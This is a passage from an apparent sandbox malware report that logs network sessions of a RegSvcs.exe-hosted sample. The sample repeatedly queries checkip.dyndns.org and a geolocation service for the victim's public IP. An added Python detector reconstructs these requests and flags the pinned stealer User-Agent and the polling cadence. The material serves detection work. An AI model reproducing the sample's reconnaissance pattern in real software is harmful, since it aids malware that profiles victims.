Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49713 | 193.122.6.168 | 80 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:48.080365896 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:27:48.744534969 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:48 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49716 | 193.122.6.168 | 80 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:49.375657082 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:27:50.033744097 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:49 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49723 | 193.122.6.168 | 80 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:50.783591986 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:27:51.420068979 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:51 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49737 | 193.122.6.168 | 80 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:52.076690912 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:27:52.705743074 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:52 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

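The sessions above show a fixed pattern worth turning into detection logic: a .NET Framework utility (RegSvcs.exe, PID 2804, and from session 8 on a second RegSvcs.exe instance, PID 6148) polls http://checkip.dyndns.org/ roughly once per second with the same hard-coded User-Agent, and each 273-byte reply hands the sample the host's public IP in the body. The script below is an added example and is not part of the Joe Sandbox report or of the sample's own code. It rebuilds the captured request and response byte-for-byte from the rows above, parses them, flags lookups of the external-IP and geolocation hosts resolved at the top of this section when the client process lives under C:\Windows\Microsoft.NET\Framework\, and measures the polling interval per PID. The benign control session, the 5-second beacon threshold, the directory-prefix check and the ISO timestamps are assumptions made for the example.

```python
# Added example, not part of the Joe Sandbox report or of the sample's own code.
# It reconstructs the captured exchanges above from the report rows (constructed data),
# flags external-IP lookups issued by a .NET Framework utility, and measures polling
# intervals per PID. Control session, threshold and path-prefix check are assumptions.
import re
from datetime import datetime
from statistics import mean

# Lookup hosts the sample resolved or contacted (all taken from the report).
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
# Exact User-Agent captured above; note "CLR1.0.3705" with no space before the version.
PINNED_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
DOTNET_FRAMEWORK_DIR = "c:\\windows\\microsoft.net\\framework"  # assumed prefix check
BEACON_MAX_INTERVAL_S = 5.0                                      # assumed threshold
IP_IN_BODY = re.compile(r"Current IP Address: (\d{1,3}(?:\.\d{1,3}){3})")
REGSVCS = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"
RESPONSE_BODY = ("<html><head><title>Current IP Check</title></head><body>"
                 "Current IP Address: 8.46.123.189</body></html>\r\n")


def lookup_request(keep_alive: bool) -> str:
    """Captured request: 151 bytes with Connection: Keep-Alive, 127 bytes without."""
    msg = f"GET / HTTP/1.1\r\nUser-Agent: {PINNED_UA}\r\nHost: checkip.dyndns.org\r\n"
    return msg + ("Connection: Keep-Alive\r\n" if keep_alive else "") + "\r\n"


def lookup_response(date: str) -> str:
    """Captured 273-byte reply that hands the sample its public IP."""
    return (f"HTTP/1.1 200 OK\r\nDate: {date}\r\nContent-Type: text/html\r\n"
            f"Content-Length: {len(RESPONSE_BODY)}\r\nConnection: keep-alive\r\n"
            "Cache-Control: no-cache\r\nPragma: no-cache\r\n\r\n" + RESPONSE_BODY)


# Sessions 0, 1 and 8 hand-copied from the report; session 99 is a constructed benign control.
SAMPLE_SESSIONS = [
    {"session": 0, "pid": 2804, "process": REGSVCS, "exchanges": [
        ("2025-01-11T01:27:41.645015", "OUT", lookup_request(True)),
        ("2025-01-11T01:27:42.292053", "IN", lookup_response("Sat, 11 Jan 2025 00:27:42 GMT")),
        ("2025-01-11T01:27:42.297210", "OUT", lookup_request(False)),
        ("2025-01-11T01:27:42.488945", "IN", lookup_response("Sat, 11 Jan 2025 00:27:42 GMT")),
        ("2025-01-11T01:27:43.211663", "OUT", lookup_request(False)),
        ("2025-01-11T01:27:43.401844", "IN", lookup_response("Sat, 11 Jan 2025 00:27:43 GMT"))]},
    {"session": 1, "pid": 2804, "process": REGSVCS, "exchanges": [
        ("2025-01-11T01:27:44.041424", "OUT", lookup_request(False)),
        ("2025-01-11T01:27:44.668097", "IN", lookup_response("Sat, 11 Jan 2025 00:27:44 GMT"))]},
    {"session": 8, "pid": 6148, "process": REGSVCS, "exchanges": [
        ("2025-01-11T01:27:56.952271", "OUT", lookup_request(True)),
        ("2025-01-11T01:27:57.622175", "IN", lookup_response("Sat, 11 Jan 2025 00:27:57 GMT")),
        ("2025-01-11T01:27:57.625521", "OUT", lookup_request(False)),
        ("2025-01-11T01:27:57.811250", "IN", lookup_response("Sat, 11 Jan 2025 00:27:57 GMT")),
        ("2025-01-11T01:27:58.499219", "OUT", lookup_request(False))]},
    {"session": 99, "pid": 4242, "process": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "exchanges": [("2025-01-11T01:28:00.000000", "OUT", "GET /index.html HTTP/1.1\r\n"
                    "User-Agent: Mozilla/5.0 (Windows NT 10.0)\r\nHost: example.com\r\n\r\n")]},
]


def parse_http_message(raw: str):
    """Split a raw HTTP/1.1 message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def analyze(sessions):
    """Return flagged requests, public IPs leaked in replies, and per-PID polling statistics."""
    findings, leaked, times = [], set(), {}
    for s in sessions:
        from_dotnet_host = s["process"].lower().startswith(DOTNET_FRAMEWORK_DIR)
        for ts, direction, raw in s["exchanges"]:
            start, headers, body = parse_http_message(raw)
            if direction == "IN":                      # replies: harvest the leaked public IP
                leaked.update(IP_IN_BODY.findall(body))
                continue
            reasons = []
            if headers.get("host", "").lower() in IP_LOOKUP_HOSTS:
                reasons.append("external-IP lookup to " + headers["host"])
            if headers.get("user-agent") == PINNED_UA:
                reasons.append("pinned stealer User-Agent")
            if reasons and from_dotnet_host:           # a .NET utility is not an HTTP client
                reasons.append("issued by " + s["process"].rsplit("\\", 1)[-1])
                times.setdefault(s["pid"], []).append(datetime.fromisoformat(ts))
            if reasons:
                findings.append({"session": s["session"], "pid": s["pid"], "time": ts,
                                 "request": start, "reasons": reasons})
    beacons = {}
    for pid, stamps in times.items():                  # polling cadence per injected process
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        beacons[pid] = {"requests": len(stamps),
                        "mean_interval_s": round(mean(gaps), 3) if gaps else None,
                        "is_beacon": len(stamps) >= 3 and mean(gaps) < BEACON_MAX_INTERVAL_S}
    return {"findings": findings, "leaked_external_ips": leaked, "beacons": beacons}


if __name__ == "__main__":
    result = analyze(SAMPLE_SESSIONS)
    for f in result["findings"]:
        print(f"session {f['session']} pid {f['pid']} {f['time']}: " + "; ".join(f["reasons"]))
    print("public IP leaked to the sample:", sorted(result["leaked_external_ips"]))
    print("beacons:", result["beacons"])
```

Run it directly to print the findings. The reconstructed message lengths (151, 127 and 273 bytes) match the "Bytes transferred" column, which is a cheap check that the reconstruction is faithful. The missing space in ".NET CLR1.0.3705" is worth noticing: a genuine Internet Explorer 6 string reads ".NET CLR 1.0.3705", so the exact User-Agent captured here is a usable literal in a proxy or IDS rule, while the process-path check catches the behaviour even if a future build changes the string.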

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 55408 | 193.122.6.168 | 80 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:56.952271938 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:27:57.622175932 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:57 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 01:27:57.625521898 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 01:27:57.811250925 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:57 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 01:27:58.499219894 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 01:27:58.685503960 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:58 GMT
Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 55426 | 193.122.6.168 | 80 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:59.344325066 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 01:27:59.993185043 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:59 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 55438 | 193.122.6.168 | 80 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:28:00.647021055 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 01:28:01.276916027 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:28:01 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 55446 | 193.122.6.168 | 80 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:28:01.913901091 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 01:28:02.579885006 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:28:02 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 55457 | 193.122.6.168 | 80 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:28:03.217564106 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:28:03.861819983 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:28:03 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 55469 | 193.122.6.168 | 80 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:28:04.599520922 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:28:05.243896961 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:28:05 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 55479 | 193.122.6.168 | 80 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:28:05.911247015 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:28:06.551422119 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:28:06 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 55488 | 193.122.6.168 | 80 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:28:07.141972065 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:28:07.777970076 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:28:07 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 104.21.80.14 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:43 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 00:27:43 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:43 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870052
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0XXk8Q3wmonYwixIekJjYcePpM67o1M4bKNXLwDIjDnH7bERlx%2BeClTHnQFpfAlBxAkUzeWy9%2Bfs8uX%2BDcqu47rN1eIKkUl1wZFqEkHQSWslOKpEbkENw1v%2Bv0SeCLsCtRzoJLg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c85a89e57d0e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2012&rtt_var=773&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1399808&cwnd=244&unsent_bytes=0&cid=b294c54046f5e1b3&ts=205&x=0"
2025-01-11 00:27:43 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 104.21.80.14 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:43 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-11 00:27:44 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:43 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870053
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vee1RkHoalnXP62gi3949jMeps3uIkKFihF4yIerJ%2Bup8y1dyIIhj7TWKzjkjFsM4P0VvgpwnqqsJ7wYBaydRbJVEUOFweWF%2FJ2eKOES87GAv01C9itnSuL1%2B6JhBPC3ysA99WhJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c85fcd2c42d2-EWR
alt-svc: h3=":443"; ma=86400
